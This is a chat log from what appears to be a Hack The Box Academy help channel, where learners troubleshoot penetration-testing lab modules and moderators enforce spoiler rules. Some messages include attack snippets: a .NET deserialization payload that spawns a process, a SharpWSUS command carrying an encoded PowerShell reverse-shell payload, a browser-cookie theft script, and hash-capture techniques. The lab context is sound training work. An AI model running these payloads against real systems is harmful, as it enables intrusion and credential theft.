with ip:port

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

English only in the server

#rules

for example POST request with XSS worked for me

but sending SVG not really

Try resetting the target, or sometimes just resetting your vm gets it to work

I tried a few times

also with VPN connection and without it

All I can say is it works on my machine

hmm

So not sure what the issue could be

Reach out to support with VPN logs, they're best placed to help with this as Marcie said

okay thx

Have you checked the help article on VPN connection troubleshooting?

I'll check it again tomorrow and contact support if needed

Well the target they're doing is a public:port so the vpn shouldn't matter

Oh

I missed that bit

But it working on pwnbox and not their kali machine is pointing to something in the install

Sounds like an issue with the IPs being blocked by your ISP then unfortunately :\

I also checked my firewall because maybe somehow it was blocked by it but nothing in logs

If you can, create a new kali vm to test with

do you have subnet which I can try whitelist on my firewall?

maybe this can help

They don't have a set subnet

Can I DM someone about the MSSQL, Exchange, and SCCM Attacks Skills Assessment? I'm not sure if the lab is buggy or if I'm going down the wrong path... I'm getting an error but not sure if it's intended. Tried restarting the lab and refreshing

"If you encounter an error while connecting to Outlook Web Access (OWA), please wait and refresh the website until the error is resolved."

Since they're on public ip ranges

Isn't there any range of public IPs which are used by HTB boxes?

Not that I'm aware of

hmm okay

I mean, you could check one IP you've been given and look at the IP range of the provider, however this isn't official advice

Those ranges may either not be accurate, or may change.

nvm, I am unlucky then 😄 I'll try to connect to different ISP or I'll have to work through pwnbox

Which module / section out of interest?

A weird thing that may help is changing the vpn region: as far as I'm aware that does effect the docker spawns

Could see how it could do, but I don't know the logic behind regional spawning any more.. can't hurt

thx guys, I'll try

Does anyone else have the multi monitor issue using VMWare Workstation 17.6? Not sure where else I should post this.

Ask vmware support

This channel is for help with academy modules, not random technical issues

Is there somewhere here I could ask?

#1024429874246590575, maybe, but vmware/broadcom support is your best bet

..better invest in funeral insurance if you want to count on vmware support, and that was before broadcom 😐

Yeah, I can't get ahold of them. Besides, their page states the issue I'm having has no workaround.

"Included in my will is a list of open VMware support requests bequeathed to my children"

ouch

Well, gotta leave a legacy I guess

..or curse

They'll remember you either way

tbh I'd try the VMware Workstation section on VMware Communities and/or r/vmware on reddit.

Hey guys O have a question about file inclusion its about php code, but I don't want to ask here because it can contain spoilers, anyone private message?

I'd at least mention the module name and section

I will write it quick but not showing anything

But thank you for not posting spoiling content

File inclusion module section PHP wrappers

Its about the wappers so I found the php code with the expect extension enabled, but when i do the needed file inclusion to read the id of the user it don't give it why? I found the flag with another wrapper but I'm curious why itdont display anything?

Hopefully someone will come back to you to offer a nudge, but I think that's enough to give them an idea as to where you are 🙂

yup thanks 🙂

Second question to, is it possible to find the php version another way then mannualy typing it, question from this text in the php wrapper section file inclusion module

I think phpversion() gets the version?

Also this is taken out of context of the rest of the section

Yeah I know but what if you can't use those type of command like you have only acces to the website

If you can get it to execute arbitrary php code, you can get the version

You're kinda overthinking it as well

Also: not every example is doable

the problem here (for me) is that I can't execute my arbitrary code without knowing the php version to acces the .ini file to identify which wrapper is actif or not

Also if you use curl -I; you might see x-powered-by: header

don't show it here but I find my way with the php://input wrapper to you 🙂

Has anyone that has done Intro to C2 with sliver had major issues trying to enumerate / get information out of the parent domain for the final step of the final skill assessment? Every time I specify -domain <parent-domain> with a powerview/sharpview command I get errors. I was able to use nltest to see some trust info, but I can't get the SID of the parent domain

I have been stuck here for a few days beating my head against the wall...

...and of course I just found a new command that got me the SID of the parent domain

still can't create a diamond ticket 🤦‍♂️

been a while but dm

I think I JUST got it

Phew, yeah got it. I need to study up on kerberos more for sure

wanna throw me a bone on this one? I get through the xss filter on the webpage, validated that it executes because it's interacting with my script on exploit server, but can't seem to extract what I am looking for

I have been following the exact instructions from the socat redirection with a reverse shell section of pivoting, tunneling and port forwarding module. I follow the exact instructions and start the listener on the pivot host, try to exploit it, exactly command for command line for line character for character, except changing the IP address to be the right IP address, and yet it doesn't give me a reverse shell.

Why is the exploit completed but no shell is returned?

I answered the question correctly based on the section I just want the hands on portion of it to work. I got my computer back finally.

Also, the VPN connection to HTB Academy isn't working and I would like some help troubleshooting that. I can't seem the ping the pwnbox from my kali VM.

anyone able to help me out?

I tried both payload from previous section and the current one

I also tried both windows and linux payload

@quasi wave regarding the VPN, have you raised a ticket with support? As I said other option would be to raise a post in #1024429874246590575 with the logs showing what's going on with the connection

I can't help with the module content I'm afraid

..but if you have the VPN logs, I may be able to take a look if you raise it in #1024429874246590575

I'm about a little longer if you can post your logs there @quasi wave

for the VPN issue I understand this

and I will do that but for my other issue that doesn't really make sense. I was able to connect to the target from pwnbox just not from my local vm. and I got the target ubuntu server listening and the pwnbox listening.

and ran the metasploit module and it didn't work

like at all. the exploit completed but there was no shell returned

Is this regarding a public IP on the section?

We spoke about this earlier I think?

all the IPs are private no? the only IP that is public is 0.0.0.0 that I see

Maybe not, must've been someone else

It depends

10.129.x.x and 172.16-32.x.x are private IPs

Some targets are within the VPN, others are hosted in public networks

But yes you are correct, those ranges are private

If you're having trouble accessing those IPs while connected to the VPN, then all I can suggest is sharing the logs with support, along with an output of your routing ip route and interfaces ip link

right I can access the IPs from pwnbox tho. I'm going to talk to support about my VPN connection. but my other issue has to do with completing the actual module.

I followed the instructions exactly and the metasploit module completes the exploit but I don't get a reverse shell

and I have tried multiple iterations of it

Right, but the Pwnbox connection is different from your conneciton

right, I know

There could be many differences that impact the connection

and I'm saying I'll get help with my connection

but what I need help from you with is something else

I'll send you screenshots because it would spoil the module if I posted publicly

Gotcha, sorry I was on the subject of connection being the issue. Module content I can't help with I'm afraid, so sorry to derail the conversation.

Mention the module and section again, and hopefully someone can advise

Ok so I did the question correctly for the Socat Redirection with Reverse Shell section of Pivoting Tunneling and Port Forwarding module.

but that's not my issue

OK

You need to check your LHOST var

the issue is I have been following along with the module (the question is just true or false so that's not my question) but anyway and I got the socat listener running on the ubuntu pivot

As it's wrong

ok thanks

how did you see my output I thought it was deleted?

It's best to set LHOST specifically to your IP on the interface connected to the network, rather than 0.0.0.0

Because of my roles

The bot flagged it for some reason, and removed it

ok thanks

You can see it's failing to bind to 0.0.0.0. 0.0.0.0 is essentially saying "bind to all IPs available"

Specify your current VPN IP instead to LHOST, or any other variable when triggering a connect back

I'm sure that's covered somewhere in the module

Good luck!

ok thanks. I am just trying to make it work in pwnbox

I will worry about the VPN after I get it working in pwnbox

can I DM you?

Make sure you're not using the VPN at the same time as the pwnbox

Ask in #1360673885376483378 - you need to verify your account by following the instructions in #welcome first @south quiver

Please don't mention specifics about active machines either

I'm gonna reread the sections tomorrow

should be fine but I think I need to get some exercise and try again

I'll say if you're still getting errors with what you're doing in what you sent me, you've things to change. Research the errors. But yes, going back over the modules related would not be a bad idea at all

i cant find the download ovpn config file button (is it disabled or something or i am just being blind lol) (in every command injection module)

You can download it from here: https://academy.hackthebox.com/vpn

Thanks man

does the same file works for every lab? (i am using this vpn thing first time for acad ;v)

No, the Academy VPN is for Academy only.

Boxes/Prolabs are different VPNs themselves

but Academy VPN works on every module in Academy if that's what you're asking

got my answer thanks

I'd recommend the TCP VPN

okie

do you know what tool to install to show ip in taskbar like pwnbox?

No. It's just there in Kali for me.

i did it with a bash file and app cmdlet preference widget : )

#1234357888114364508 if you believe it to be a problem

I might have understood it wrong, let's see what the others think

i'm telling you to post it in #1234357888114364508 -> you're more likely to get a positive answer there, and if it's an issue the module author/staff can fix it

that way it doesn't get buried

worst case; it's not a typo, and it does indeed work that way

hello, i want to ask for this last question

maybe any clue/hint that might helpful?

i try to read forums about this but still got stuck on it

Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.

wordpress skill assessment

@eager ledge @rustic sage take it to DM please

Those messages contained spoilers about a module above Tier 0.

Soz, didn't know a better way to hide it 😂

If in doubt, take it to DM 😉

#Attacking Active Directory & NTDS.dit : John Marston IT Director, Carol Johnson Financial Controller and Jennifer Stapleton Logistics Manager. i created a wordlist with help of given username but i am not able to crack username and password anyone can help ?

The question specifies who's username to find

John Marston's

hi guys so i am bit confused

I am told to perform extrasid attack on windows

however upon rdping into the machine

there is no poweview, no mimikatz or rubeus

how am I meant to do this?

Active Directory Enumeration & Attacks
Attacking Domain Trusts - Child -> Parent Trusts - from Windows

nvm it looks like i need to transfer tool from linux to windows

@rustic sage If it's the skills assessment you'll need to upload tools. If it's just the lab/module question it should be in C:\tools

Can anyone help with this? 🙏

yy should i use windows with vm linux or linux with vm windows for soc analyst path

im everyday linux user but when doing rev eng etc need to use windows so whats better in this situation

any one please help me with File Upload module ...

──(kali㉿kali)-[~/htbacademy/windowsprivesc]
└─$ chmod 777 cookies.sqlite

┌──(kali㉿kali)-[~/htbacademy/windowsprivesc]
└─$ sudo python3 cookieextractor.py -dbpath="cookies.sqlite" --host slack --cookie d
Traceback (most recent call last):
File "/home/kali/htbacademy/windowsprivesc/cookieextractor.py", line 39, in <module>
main(args.dbpath, args.host, args.cookie)
File "/home/kali/htbacademy/windowsprivesc/cookieextractor.py", line 21, in main
cursor.execute(query)
sqlite3.OperationalError: no such table: moz_cookies

┌──(kali㉿kali)-[~/htbacademy/windowsprivesc]
└─$ sqlite3 cookies.sqlite ".tables"
moz_cookies

whats wrong with this can anyone help me, its in Windows Privilege escalation module > Pillaging

bro what kind of script it is I mean cookieextrator ?

Use win 10 vm in linux. Make sure to use Qemu instead of v-box

Also give it some juicy ram and cpu if you can

im rn on 16gb ddr 5 ram. Option 1 is to by another thinkpad only for linux or option 2 is to by more ram ( both options are expensive in this situation)

Qemu is source efficient. This should be enough

Just ask

Hi all, can someone give me a lil hint about Hard Skill Assessment of HTTP Misconf?? Ty!

Windows Privilege Escalation > Windows Built-in Groups

https://academy.hackthebox.com/module/67/section/601

Here's the question. The example shows how to extract NTLM hashes from NTDS.dit. I created a shadow copy of C:\ and copied the NTDS.dit file. I want to extract the hashes using DSInternals on a Windows host. In the example, there's a command:

$key = Get-BootKey -SystemHivePath .\SYSTEM

But it's unclear where this SYSTEM comes from. It's not the result of exporting with the command:

reg save HKLM\SYSTEM SYSTEM.SAV

This file was already in the C:\Tools folder.

So where do get it from?

I've already tried everything..

My notes showing me that for Skills Assessment you need to use SeBackupPrivilegeCmdLets.dll and SeBackupPrivilegeUtils.dll under C:\Tools. With this privileges just copy flag.txt

yes, I tried, on the last screenshot

did you find the unkeyed value yet?

Do it with flag.txt not NTDS

I got the flag, everything worked out there. I'm trying to work with NTDS.dit, as described in the example

it work via secretsdump. but not work via DSInternals

Not sure then, being a while since I did that module tbh

maybe one of the moderators knows?

if it's already written, you need to read and try..)

The file hash for both files are different

I'm trying to make work with DSInternals

The ACL is also different, but it should be a problem since we have FullControl with svc_backup

DM

Can anyone give a nudge on MSSQL, Exchange & SCCM skills assessment?

||Trying to move laterally from DB01 to DB02, Have sysadmin as domain user and local admin as a local user on DC01 but struggling ||

did u try HKLM\SYSTEM

or does the .\SYSTEM not work on its own

I got error using DSInternals with both files (the one in the Tools directory and from directly saving it with reg.exe)
I was able to get it partially working but something while parsing the hive was still erroring out.
I’ll retry in a bit

Hi, I have the same problem and did you fixed this? Also can someone help to solve this challange. Tried many variations and when sending in 'Send group in sequence (single connection)' the first requeste response panel is empty but the second request/response panel shows information and the connection is extreem slow in function 'Send group in sequence (single connection)'. Current speed is: $ sudo ethtool eth0 | grep Speed
[sudo] password for kali:
Speed: 1000Mb/s. Its for TE.CL exploitation

You abused SQL Links?

Yeah managed to get DB02, just looking at the SCCM server now

Just not sure if I've used the intended way...

You probably need to enum links again

Same with the first question, the account I was given has no mailbox assigned

oh yeah... forgot about that

It has to do with permission. I think it's how the script is written.

https://forum.hackthebox.com/t/windows-privesc-windows-built-in-groups-sebackupprivilegecmdlets-dll/278938/5

I went in to use the DA to PtH into an RDP session and confirm the information in the Forum, and it worked
PS: Can't confirm 100% that the behavior of Get-Bootkey is what it's detailed in that post. Would have to go through DSInternal's code.

You can get the version of vsftpd once you have entered the target system via SSH, with the user John. Have you tried?

Edit: Of course as soon as I ask here ... nvm

Yes, it's my problem!

therefore, in this case, I conclude that I can only use secretsdump. DSInternals will be usefull, If I will have NT AUTHORITY\SYSTEM access

I'm stuck on the Situational Awareness section of the Windows Privilege Escalation module and I have no clue what to do.
I need to find whats blocked other than cmd.exe and changed their current command to find exe files that are denied but everything is allowed in system32.

Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\*.exe -User Everyone

I'm still struggling to connect to it. The ports 5985,5986 seem closed, pswa is open but denies authentication

try other ports that you have seen before maybe. higher ones

How to message in general

I tried up to port 9999 on backup, should I target wsus ?

@everyone

Fellows, bloodhound on Kali. The repos install 4.3.1 is maybe 'legacy'. I'm having trouble getting sharphound running on targets as a result. Am I missing an easy solution or is the fix to install the newest Bloodhound CE?

idiot

Hoping I can avoid newest installs which look docker only.

Follow the instructions in #welcome

DM

Hey! Got stuck at this poeint in "linuy fundamentals" :

Any idea, how get I solve this?

I need help @dapper moth 😩

Help with what?
No double posts, please.

With what, my friend?

shells and payloads

Live engagment

Host 3

🐚 here you go @leaden island

Am i supposed to upload tools and do priv esc ?

Wasn’t that hard to get a shell now was it

I got thw shell but

The flag is under administrator acc

It was the easiest host to get a shell so i believe im missing something

I did all hosts without any hints (until now ) am i good

Can anyone give a hint for MSSQL, Exchange, and SCCM Attacks skills assesment last question?

Sure! There is a guide in one of the sections. Try performing the exact steps
You might find something “juicy”

I've read it again and again, will have another look through 😅

You can DM
I just don’t want to give too much spoiler in the channel

This is probably better asked in #general or maybe there's a more specific channl.

Oh sorry I remember being here and switching to general and now confused as to why it didn't work it must of been lagging sorry bout that

Hii do u guys know how to help unban accounts??

not that kind of hacker chat here, you'll likely be escorted out... though I don't know this constitutes serious rule break

Oh okay sorry. Do u guys know anyone servers that can help me with that rho?

Yeah, the hint made it all

I would have knew it if my brain wasnt telling me "all the hosts were deticated to web applications, so this has to be"

help please im doing Active Directory Enumeration and attacks on Attacking Domain Trusts - Child -> Parent Trusts - from Linux
The question is Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.

It want me to perform "lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 " but I dont have a password for that user?

Hello,
It looks like EyeWitness is like the number 1 tool to do web enumeration from the CPTS path. I'm on arch linux and I wanted to know if anybody knew how to fix these errors that won't go away:

~/tools/EyeWitness/Python/EyeWitness.py -f subdomains.txt -d eyewitness_report
And I get the output:
Starting Web Requests (10 Hosts)
Message: Invalid Host header localhost:60779

Message: Invalid Host header localhost:45027

Message: Invalid Host header localhost:37841

Message: Invalid Host header localhost:48379

Message: Invalid Host header localhost:47711

Message: Invalid Host header localhost:35231

Message: Invalid Host header localhost:41165

Message: Invalid Host header localhost:40303

Message: Invalid Host header localhost:57337

Message: Invalid Host header localhost:46867

Finished in 13.85072922706604 seconds
[*] No report files found to open, perhaps no hosts were successful
I made sure the targets were reachable with curl, and I tried with my proxy but it doesn't send anything to my proxy...
I've run out of ideas of how to troubleshoot this.

Guys hello

In Android Fundamentals where the build number of the device is located?

We are not interested in such things here so spammers may leave

This is cybersrcurity professionals chat

Did you update your host file?

Password is in the previous module

yes sir!

10.129.229.147 inlanefreight.local blog.inlanefreight.local careers.inlanefreight.local dev.inlanefreight.local etc...

Also, if I hadn't, the curl commands wouldn't have worked

hey, im having trouble with the nocturnal machine, can you give me minor hint on the initial foothold, really strugulling here(

#1360673885376483378

Guys has anyone passed Android Fundamentals?

not sure if I'm allowed to ask this here. I asked it in #general a few weeks ago - are any of you still logged in to Academy through the old sign in and not through sso?

I think the login only works via SSO

The format of subdomains should be http://domain.com

Hi guys anyone from htb here i mean working in htb i have a issue to share.

Reach out to support

you need to log out and log back in

Hey guys I'm stuck on a question in the file inclusion module, remote file inclusion section, they say that we need to find a rfi, what I did and to find the flag in one of the directories located in the / path, what I find, but when I cat itI receive a string with numbers and letters (it is not encoded) but when I put it in as awnser it is not correct

lol my bad there was a space in my awnser 🤡

Great! Use this command 'runas /user:netadm cmd' or logout and login again

Hi guys i have a question

i tried to hack my own wifi using kali linux but i dont have a wlan, is there another tools in kali you dont require a wlan in??
Please anserr me

In about system, scroll all the way down in settings

The thing that u click it few times for developer options

there is such a huge amount of everything i can't understand where is build number

Software info, firmware info, related strings

which command did you use to unzip flag.zip in adb section?

I didnt do any android modules, i just work as a repair tech

But i believe unzip xxx.zip will do

does nothing

Idk, google do

Yes I know, After you escalate you need to log off and log back in to get admin privs or you can run that command as an alternative to get an admin shell

It's because the service is already running

Logout and log back in and try it again, if it still doesn't work terminate the instance and spawn a new target

No there is a clean up process

In that module, they have showed a clean up process, you need to do that

You're in an administrative shell

This didn't work because of that

Close all your terminals first

I already wrote above that the DNS service works correctly. There is no need to delete the registry key, it does not exist. Before cleaning I could not perform nslookup localhost. Now I can. But I can't restant service

@quartz sundial please refrain from posting content from the module when asking for help when the module is above tier 0

Guys, help
I am at Intro to Network Traffic Analysis and cant find TCPDump-lab-2.zip...

I didn't publish any screenshots from the module

there's the > resources < button, some sections may have a dl next to the questions

thank you, my saviour

Marcie hello have you done Android Fundamentals?

no

Don't use -L when connecting

?

I mean i went off the most common issue that happens

But when you connect to smb you have to specify a share

Oh

\\\\someip\\someshare

Alternatively just do //someip/someshare

Smbclient accepts both

@outer mirage why did you delete your messages?

??

https://tenor.com/view/crazy-eyes-gif-22676523

Jon was never there 🥸

simple internet paranoia that their professor instilled in their students

I have a problen at the end of shell and payload exam. I hate start freerdp and i got the ip target but the instance have no internet for search why ? How i can going to appache??

firefox

😉

I have no firefix on freerdp

Of the instance

Try typing it in the terminal

Its work !! Great thakyou ! Its my first time that its happen the firefox as hide

@fathom pendant can we get in VC for a sec?

https://tenor.com/view/gohine-hohino-no-hohineee-gohineee-gif-17792172174678204487

Hi guys, currently facing a problem in this module 'Authentication Bypass via Parameter Modification', cant figure out whats the issue to acquire the user_id. Heres my payload 'ffuf -w ./token.txt-u http://94.237.52.228:41679/admin.php?user_id=FUZZ -c -t 200'. In the token.txt i am using 1 (not 0001) to 9999. Any hints?

did you filter correctly?

any thoughts on this?

Did you add a / to the end?

yup

Did you try not doing that? I also forget but there is a curl flag to follow links, -L I think?

Did you try visiting in browser?

yes, still shows the same thing "301 moved permanently"

i havent tried using the -L flag though

Hey all, I have a quick question about the VM management module, specifically as it pertains to installing Nessus on a Pwnbox machine.

I have started the process prior to tonight and I noticed as it gets finished compiling plugins the machine runs out of disk space and I never got it to completion the first time around. I am working again tonight on re-configuring the box to perform the vuln scans required but I am just curious if maybe it was a one off issue or if anyone else has seen problems with the required size of the installation vs the pwnbox resources allotted?

which module and section?

Nessus Skills Assessment under vulnerability assessment.

There's no need to install Nessus, read the Reminder section.

Oh wait, I think I see the problem... I might be installing the software when its already available.

Thanks for the nudge, apparently working on this late at night impacts my ability to read nicely placed banners.

They are all showing status 200

that doesn't mean much

status 200 could just be a default page that loads, not necessarily a 404

and since you're on a page that you know exists; you would not expect a 404 error

Hi

Module: Windows Privilege Escalation
Section: Interacting with Users
Section link: https://academy.hackthebox.com/module/67/section/630

I got the hash of the sccm_svc user.
Upon checking the writeable directories on the shares, I could see a lot of them and couldn't figure out which one was frequently accessed by other users. So, I added .scf file on all those directories. From evasion point of view, I am sure that this is not the best practice. So, my question is how do you figure out which one is most accessed location?

If you're trying to evade detection as much as possible, I suppose you'd just make an educated guess or place it in a share you know is eventually going to be accessed by a user belonging to a certain group.

Hi all Question about Password cracking Module

Module name Passwd, Shadow & Opasswd

Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.

When I try to use the hash cat on my vm to crack the hash it gives Status...........: Exhausted

did anyone face this issue during cracking the password for this module question

Are you using the provided wordlist?

yep I did use the resources Password list

and I did mutate the same password list and tried getting the same error

so I thought

After mutate it became big so I split in to 6 separate file and tried still no luck

If i ask ChatGPT about something from the modules, will that constitute a content leak?

As long as you don't give it information for modules above tier 0, you're fine

DM me with the steps you took & commands you used

Ok Thanks

I am stuck doing the administrator machine. Any help would be appreciated.

#boxes, if you don't have access get identified, instructions: #welcome

also don't post ANY content about the box even in ||spoiler|| tags

I am getting an error to get identified

Identification error: please contact an online Moderator or Administrator for help.

Hi everyone, I just got started with CPTS modules and in Footprinting section, I am having a bit of a trouble wrapping my head around it.
There are a lot of entries in DNS Record like A AAAA NS CNAME TXT and all. how do I know when to use which query??? Its a bit confusing for me.

Hi. Each of those records have a meaning. For example, A records hold the IP address of a domain. You can refer to the types here:
https://www.cloudflare.com/learning/dns/dns-records/

You then query using tools like dig or nslookup for the type of record you're searching for.

So, is it as simple as, we query for ip addresses directly from the DNS servers using these commands?

Yes and no.

Yes as in you can simply query the DNS server to resolve an IP address.

No as in there are other cases.

ohkk, thanks for sharing this. let me have a look

Hi im using pwn box doing the active directory enumeration and attacks but the RDP window just becomes black every time. Have restarted pwnbox and target multiple times but can get into the RDP session

I believe dig has an ANY option to retrieve all records possible

The ANY option doesn't always work properly though (I've experienced cases where it hasn't listed out some records). I'd suggest to always enumerate all the types one by one to double check.

When it becomes black, click in the window and hit the Enter key. That should resolve the issue.

this is so cool, you can retrieve records for a specific service

Thanks god yes it helped

Well, it's less so "service", more so the "hosts" you're gathering the info for.

Think of DNS like a phone book: It's like looking up numbers associated with a certain company.

yeah I mean the same, just different words but you get the gist

Yeah, got it. I just wanted to make sure you weren't misunderstanding 😅

I have a question does DSA help in cyber security???

Yes, it can help. Especially with cryptography.

Does it also help in writing script

It could help depending on the type of script you're writing I guess.

Thanks @normal sand

hey guys for advanced deserialization module, for JSON deserialization, i dont understand why my payload doesn't work locally. I've already completed the section because it worked against the target live, but on my own local machine it doesnt. Even the PoC i built with csharp works while following instructions from the module.

in the module, dnspy will create an exception error and spawn notepad.exe from w3we.exe, but in my dnspy it does not create the exception error and does not spawn notepad.exe

this is my payload

||{"$type":"System.Windows.Data.ObjectDataProvider, PresentationFramework","ObjectType":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","MethodParameters":{"$type":"MS.Internal.Data.ParameterCollection, PresentationFramework","$values":["C:\Windows\System32\cmd.exe","/c notepad.exe"]},"MethodName":"Start"} ||

i didn't change anything in the app code.. so unsure if its my env?

Is defender on?

Password attack module
Trying to log in to the machine using the given login details but looks like password is wrong is this usual

use xfreerdp then use ssh to enter the linux session, see the image under Scenario

oh got it thanks

that's a another issue for me I can't do RDP from machine to windows boxes

I solved it! There is no -test in the answer as in the example.

I have to use the HTb instances to rdp in

do I have to change any VPN settings all the windows boxes I cant RDP in from my machine

No clue, maybe change MTU?

Ok I will try the MTU thanks

Awesome MTU did work 🙂

Do i get exp for my HTB Rank when i done a module in academy?

No

ok thx 🙂

I have the same question, did you get any aditional hint ? regards

I have trouble with this Introduction to Digital Forensics
Skills Assessment
Using VAD analysis,

I have used velociraptor and get about 80 rows of results

Hi, currently on the Windows Lateral Movement SA, trying to get access to ||backup|| via ||wsus|| but am seem to be unable to receive a reverse shell at at WSUS.
||```
.\SharpWSUS.exe create /payload:"C:\Users\rossy\Desktop\PsExec.exe" /args:"-accepteula -s -d cmd.exe /c powershell -e JABjAGw....." /title:"NEwDadadad"

Any way to monitor and analyze traffic with grpc in Flutter app?

its done but how i get the file

Guys good day. Has someone done Android Fundamentals?

Need help

Hey, I am working in Static Analysis from Windows Evasion Techniques module, I have an issue with the lab, I did everything correctly and I was undetected by AV but I could not retrieve the flag.

attacking common services easy

in the xss module regarding phishing in XSS assessment. I was able to inject a login page but had a really hard time cleaning up the page. Can someone look at my payload and let me know what i'm doing wrong ?

You want to look for pages that have both write and execute permissions. Those usually don’t exist but malware loves creating those to write and execute shell code in one go. If you apply that filter you will have very few potential candidates

Make sure you created a .net framework program and not a normal .net, your executable is supposed to be just a .exe and not one that comes with a .dll

sure

Girald in Android Emulators they want to provide build number of the device but there is a huge build number which one is the actual build number? I tried many versions and all of them are incorrect answer

I have the same question, could you give some help?

Unfortunately I remembered that I have the same problem 😅

I asked the support they told me they will contact me when they know the answer

Have you done anything from the skills assesment?

still

you need help with something @eternal gust , this isn't #general, to access that you'll need to read and follow #welcome to access it

you gonna say something or just speak in stickers

still haven't done?))

yeap, if you wana chat at #general

may be dm?

what module is this?? I didnt know they had android stuff too

Android Fundamentals

you can get build number from settings ig

or maybe adb

with very strange questions I suppose you can pass them if you have step by step option

Yes I got build number but in build number they have huge amount of information and I can't understand where in this information the build number is

hmm you might have to look at sample build numbers and figure out lol

Lol I am that clever too but it doesn't work)))\

I tried dozens of combinations but none of them is correct

Thank you

i solved this, but now i can't find the final answer in skills - Following the steps provided in the Native Apps section, develop and deploy an application that will print the string returned from the Build.MODEL constant. Use the 'Pixel 3a API 34 Google APIs' (other emulators might work as well). What is the value of this string?
When i run the app, it shows Hello Android! but it's not correct answer, so need to dig dipper.

gah, so BloodHound CE doesn't have any of the baked in queries like "shortest path". It looks like you can query the database for this sort of info but I don't know how to connect to neo4j (it's running on port 7474, but the credentials don't match what I'm using for bloodhound UI on 8080). Has anyone bookmarked a good tutorial on navigating CE? It's hard to find good info because how much is out there about legacy.

Can anyone help me with Wi-Fi Evil Twin Attacks - DNS Spoofing section?

Hello! I am getting this error : KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type) on the final part of the skills assessment of the Active Directory Trust Attacks module. Can someone help me, please?

PassTheCert https://github.com/ly4k/Certipy/issues/205

Wait a little bit for AD CS to start
There is a post in #1234357888114364508 about it

Guys hello has anyone completed Android Fundamentals?

Hi all, I'm trying to get started on Whitebox Pentesting 101: Command Injection module, and I'm not sure how to connect to the docker image

"At the end of the Secure Coding 101 module, you should have been able to extract a link and an archive password, through reversing or exploiting the JavaScript code of that module:" <gives a path and a password>

I didn't take / buy the Secure Coding 101 module.

Start the target server as described in the module

got that part, but what then?

Have you read the text? It gives you the link, the corresponding password and tells you what you have to do with it

any begginner wanna learn together?

my browser somehow reset and now when i try to log back in via my google account i get an error

Hello mates
Any help with skill assessment in android fundamentals on last task where I should sign the already compiled apk and install it
Any suggestions please?

I have tried to unzip this apk and import in Android Studio like new project and then sign it
Not helped (

If you have a question regarding the module, it would be quicker to just ask it so someone who's done it can reply.

Yes, I read it, I just derped

I am seeking for such person noone has done.

any ideas?

@dark jay Please don’t share any flags

okayy

Hello, I am currently doing this and I have the same problem for the build number and also in the skills Assessment I have several answers that could be right for the first question but none seem to be valid it's weird.

Otherwise for the other exercises all is ok

I messaged to the support and waiting answer for them. Btw I checked the file for the last exercize for skills assessment and it seems to be corrupt. Cause Android studio and other emulators are refusing to sign them.

and I am a bit confused about com.android.settings. application I have never seen something like that to be honest how such kind of application can exist ever.

For the skills assessment, everything went well except for the first question, so if you have a problem, don't hesitate to ask me if I can help.

hlw , my self imran , i am studying in 12th class and intrested in cybersecurity and in my beignier level i am struggling in some issues or errors can anyone help to resolve my errors

hello guys i need help with Advanced XSS and CSRF module, I'm stuck on the XSS Filter Bypass exercise? Thanks in advance to the helpers

@unique smelt please don't spam all the channels with the same question. If your question is related to modules post it here.

ok !!

first you say post in modules then you say dont spam, everthing o.k?

Not you.. I was tlaking to Imran890 who posted in a bunch of channels.

o.k sorry

if i have some questions and error so where i can get help ?

pardon buddy !!

Depends on what your questions are about. You'll need to follow the instructions in #welcome to gain access to most of the server.

ok!!!

hey guys i need some help on the service enumeration module, i just started and am kind of a noobie

somebody 😭

elaborate, thats not how this works.
State the module/section, description of the problem, maybe a screenshot of your attempts.

dang my bad

Service enumeration
Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.

Its just about using nmap and nc to find the flag but i think my IQ is 60 since i cant seem to find the flag

i did clear like 10 minutes ago cuz i was getting frustrated

What commands have you tried so far?

i've done the sudo nmap to see what connections there are, tried nc on all the open ports

Type out the actual nmap and nc commands you have tried

sudo nmap 10.129.113.255 --top-ports=10
nc -nv 10.129.113.255 (all open ports)

PORT STATE SERVICE
21/tcp closed ftp
22/tcp open ssh
23/tcp closed telnet
25/tcp closed smtp
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
443/tcp closed https
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server

kevin you are goated if you can solve this for me

Instead of top ports command run a full port scan with the -p- param and see what you get

doing it, but i dont think any more will pop up

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
31337/tcp open Elite

Have you tried connecting to any of these ports ?

For example

nc <port> <IP>

which one do you want me to try ?

i did the command earlier but i would like to show you what I see

they want you to use -sV?

thats what the version scanning is for

was it that simple?

on the nmap command you mean?

I'm not awake yet, try -sV on nmap

nice

from the module-sV Performs service version detection on specified ports.

PORT STATE SERVICE VERSION
21/tcp closed ftp
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
23/tcp closed telnet
25/tcp closed smtp
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp closed https
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3389/tcp closed ms-wbt-server

dang thank you for being so helpful TLattice

i didnt think people would just help strangers like that

did you get the flag tho?

might have to netcat them still

i just see this

m

but which one

not that many open

but if i do like the 110

nc -nv 10.129.113.255 110

Connection to IP 110 port [tcp/*] succeeded!
+OK Dovecot (Ubuntu) ready.

I'm trying to get proxychains to work, I edited and save the configuration file exactly how it says to in the module. When I run curl I keep getting a message saying that it cannot connect to server. I tried this running regular curl and it connects just fine. Has anyone else run into this?

i just see this and it keeps me waiting

if theres no flag then move on to the next

keeps me edging

ohhhh

because youre connected to it

dang

my bad for only asking the stupid questions

ok no like

i netcatted every open port and all it does is connect

